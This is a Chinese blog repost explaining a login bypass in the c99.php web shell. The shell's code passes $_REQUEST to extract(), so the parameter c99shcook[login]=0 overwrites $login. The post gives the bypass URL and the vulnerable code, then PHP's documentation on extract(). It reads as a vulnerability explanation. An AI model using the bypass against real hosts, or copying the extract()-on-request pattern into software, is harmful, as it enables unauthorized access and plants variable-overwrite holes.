C99.php存在一个漏洞可以绕过登陆密码直接登陆的漏洞。
http://127.0.0.1/c99.php?c99shcook[login]=0
可直接登陆。
漏洞原因是,错误的使用了extract()导致变量覆盖漏洞,即下面代码:
@extract($_REQUEST["c99shcook"]);
正好在验证登陆语句的前面,而验证登陆的代码为:
if ($login) {
if (empty($md5_pass)) {
$md5_pass = md5($pass);
}
if (($_SERVER["PHP_AUTH_USER"] != $login) or (md5($_SERVER["PHP_AUTH_PW"]) != $md5_pass)) {
if ($login_txt === false) {
$login_txt = "";
} elseif (empty($login_txt)) {
$login_txt = strip_tags(ereg_replace(" |<br>", " ", $donated_html));
}
header("WWW-Authenticate: Basic realm=\"c99shell " . $shver . ": " . $login_txt . "\"");
header("HTTP/1.0 401 Unauthorized");
exit($accessdeniedmess);
}
}
转自:http://lcx.cc/?i=4381 和http://thehackerblog.com/every-c99-php-shell-is-backdoored-aka-free-shells/。
ps:在php中extract() 函数从数组中把变量导入到当前的符号表中。 对于数组中的每个元素,键名用于变量名,键值用于变量值。
语法
extract(array,extract_rules,prefix)
参数
描述
array
必需。规定要使用的输入。
extract_rules
可选。extract() 函数将检查每个键名是否为合法的变量名,同时也检查和符号表中的变量名是否冲突。
对非法、数字和冲突的键名的处理将根据此参数决定。可以是以下值之一:
可能的值:
EXTR_OVERWRITE – 默认。如果有冲突,则覆盖已有的变量。
EXTR_SKIP – 如果有冲突,不覆盖已有的变量。(忽略数组中同名的元素)
EXTR_PREFIX_SAME – 如果有冲突,在变量名前加上前缀 prefix。自 PHP 4.0.5 起,这也包括了对数字索引的处理。
EXTR_PREFIX_ALL – 给所有变量名加上前缀 prefix(第三个参数)。
EXTR_PREFIX_INVALID – 仅在非法或数字变量名前加上前缀 prefix。本标记是 PHP 4.0.5 新加的。
EXTR_IF_EXISTS – 仅在当前符号表中已有同名变量时,覆盖它们的值。其它的都不处理。可以用在已经定义了一组合法的变量,然后要从一个数组例如 $_REQUEST 中提取值覆盖这些变量的场合。本标记是 PHP 4.2.0 新加的。
EXTR_PREFIX_IF_EXISTS – 仅在当前符号表中已有同名变量时,建立附加了前缀的变量名,其它的都不处理。本标记是 PHP 4.2.0 新加的。
EXTR_REFS – 将变量作为引用提取。这有力地表明了导入的变量仍然引用了 var_array 参数的值。可以单独使用这个标志或者在 extract_type 中用 OR 与其它任何标志结合使用。本标记是 PHP 4.3.0 新加的。
prefix
可选。请注意 prefix 仅在 extract_type 的值是 EXTR_PREFIX_SAME,EXTR_PREFIX_ALL,EXTR_PREFIX_INVALID 或 EXTR_PREFIX_IF_EXISTS 时需要。如果附加了前缀后的结果不是合法的变量名,将不会导入到符号表中。
前缀和数组键名之间会自动加上一个下划线。
本函数返回成功设置的变量数目。